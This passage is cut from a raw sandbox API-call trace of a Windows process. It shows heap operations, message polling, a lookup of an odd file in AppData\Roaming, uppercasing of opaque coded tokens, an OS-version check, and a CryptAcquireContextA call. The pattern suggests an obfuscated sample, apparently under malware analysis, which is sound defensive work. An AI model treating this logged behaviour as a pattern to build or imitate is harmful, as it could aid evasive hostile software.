(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0152.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0152.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0152.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0152.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0152.177] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/xin7s.odp", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf02b7c0, ftCreationTime.dwHighDateTime=0x1d5d233, ftLastAccessTime.dwLowDateTime=0xe104e200, ftLastAccessTime.dwHighDateTime=0x1d5cb30, ftLastWriteTime.dwLowDateTime=0xe104e200, ftLastWriteTime.dwHighDateTime=0x1d5cb30, nFileSizeHigh=0x0, nFileSizeLow=0x14669, dwReserved0=0x0, dwReserved1=0x0, cFileName="xin7s.odp", cAlternateFileName="")) returned 0x9e1cf8 [0152.177] FindClose (in: hFindFile=0x9e1cf8 | out: hFindFile=0x9e1cf8) returned 1 [0152.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0152.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0152.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0152.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0152.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0152.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0152.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0152.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0152.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0152.177] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0152.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0152.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0152.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0152.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0152.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0152.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0152.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0152.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0152.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0152.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0152.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0152.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0152.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0152.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0152.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0152.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0152.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0152.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0152.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0152.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0152.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0152.178] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.178] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0152.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0152.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0152.178] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0152.178] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0152.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0152.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0152.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0152.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0152.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0152.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0152.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0152.179] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0152.179] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.179] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0152.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0152.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0152.179] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0152.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0152.179] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0152.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0152.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0152.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0152.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0152.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0152.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0152.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0152.179] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0152.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0152.179] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0152.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0152.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0152.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0152.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0152.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0152.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0152.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0152.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0152.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0152.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0152.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0152.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0152.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0152.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0152.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0152.180] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0152.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0152.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0152.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0152.180] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0152.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0152.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0152.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0152.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0152.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0152.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0152.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0152.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0152.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0152.180] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0152.181] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.181] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0152.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0152.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0152.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0152.181] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.181] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0152.181] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.181] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.181] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.181] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.181] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.181] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.181] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0152.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0152.181] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.181] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.181] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0152.181] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.181] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0152.181] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0152.181] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0152.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6f20, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0152.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0152.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6f40, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0152.182] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bf000) returned 1 [0152.183] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.183] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.183] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0152.183] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.183] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0152.183] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.183] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.183] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.183] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.183] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.183] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.183] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0152.183] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.183] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0152.183] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.183] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.183] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.183] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.183] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.183] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.183] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.183] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0152.183] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.184] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0152.184] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.184] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.184] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.184] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.184] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.184] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.184] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.184] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0152.184] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.184] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0152.184] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.184] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.184] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0152.184] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0152.184] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0152.184] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0152.184] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0152.184] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.184] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.184] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0152.184] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.184] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0152.185] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.185] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.185] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.185] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.185] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.185] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) 